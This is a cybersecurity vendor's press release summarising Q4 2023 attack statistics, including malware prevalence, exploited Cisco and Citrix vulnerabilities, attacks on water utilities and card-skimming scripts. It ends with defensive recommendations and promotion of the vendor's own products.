Positive Technologies: 73% of successful attacks on organizations employ malware

Positive Technologies analyzed the Q4 2023 cybersecurity threatscape. According to the study, three in four successful attacks on organizations in that period employed malware, and one in three attacks exploited existing vulnerabilities. Analysts also note that half of all successful attacks in Q4 2023 resulted in leakage of sensitive information, with an increasing proportion of bank card data.

The study reported a 19% increase in incidents in the fourth quarter of 2023 compared to the same period in 2022. Targeted attacks accounted for 78% of all successful cyberattacks. In addition to sensitive data leaks, the top consequences of successful attacks were disruption of core business operations for organizations (33%) and direct financial loss for individuals (30%).

Of all successful attacks on organizations in Q4 2023, the percentage of attacks that used malware increased from 45% to 73% compared to Q3. The top three most common types of malware were ransomware, spyware, and remote access trojans. The number of spyware attacks on organizations increased by five percentage points from the previous quarter. The analysts point out that spyware was trending throughout 2023.

Nearly a third (31%) of successful attacks on organizations involved exploitation of vulnerabilities. Notably, tens of thousands of devices have been hacked by exploiting the critical vulnerability CVE-2023-20198 (CVSS score of 10) that affects the Cisco IOS XE operating system. Another prominent vulnerability was CVE-2023-4966 (Citrix Bleed with a CVSS score of 9.4) that affects Citrix's NetScaler ADC and NetScaler Gateway. Hackers exploited it to attack large companies like Boeing and the Chinese bank ICBC.

The analysts also noted an increase in attacks on water systems in Q4 2023. Hacktivist group Cyber Av3ngers escalated attacks against the industrial control systems of Unitronics, an Israeli manufacturer. Cyber Av3ngers claim to have hacked a dozen industrial water treatment plants in Israel and seized control of a pumping station in the U.S. state of Pennsylvania. A similar attack in Ireland left 180 households without water for two days. Ransomware operators also targeted water supply systems: for example, a North Texas water utility was attacked by Daixin Team.

The percentage of payment card data in the total amount of information stolen in Q4 2023 increased compared to the previous quarter: from 3% to 5% in attacks on organizations and from 13% to 16% in attacks on individuals. Cybersecurity researchers attribute this growth to several large campaigns using JavaScript sniffers: malicious scripts that collect banking card data entered by users on websites during online shopping.

"It comes as no surprise that the number of attacks aimed at stealing the payment card data of online store customers increases around the holidays," says Yana Avezova, Senior Information Security Analyst at Positive Technologies. "One of the reasons why such attacks are successful is because people use outdated software. Attackers exploit vulnerabilities in outdated versions of CMS systems to inject malicious scripts into online store websites. Data obtained using JavaScript sniffers is later sold on the dark web. To avoid such leaks, we recommend shopping only at well-established online stores, using payment services that allow you to pay without entering your bank card details, having a separate card for online payments, and not keeping large sums of money on it."

Positive Technologies recommends that online store administrators regularly perform security assessments of their websites, update their CMS and plugins in a timely manner, and use strong passwords and multifactor authentication.

To protect against cyberattacks, experts also recommend that organizations select software vendors and distributors responsibly to minimize the risk of supply chain attacks. Enhancement of vulnerability management processes and participation in bug bounty programs will further improve the cybersecurity posture. First and foremost, organizations need to fix vulnerabilities that are already being actively exploited by attackers and for which publicly available exploits exist.

Experts also recommend using web application firewalls such as PT Application Firewall to harden the network perimeter. To protect devices from malware, a sandbox solution such as PT Sandbox can help by analyzing the behavior of files in a virtual environment. Vulnerability management systems (for example, MaxPatrol VM) enable cybersecurity teams to establish vulnerability management processes, while security information and event management systems (such as MaxPatrol SIEM) help detect security incidents in a timely manner. Advanced persistent threats can be discovered using a network behavior analysis solution such as PT Network Attack Discovery.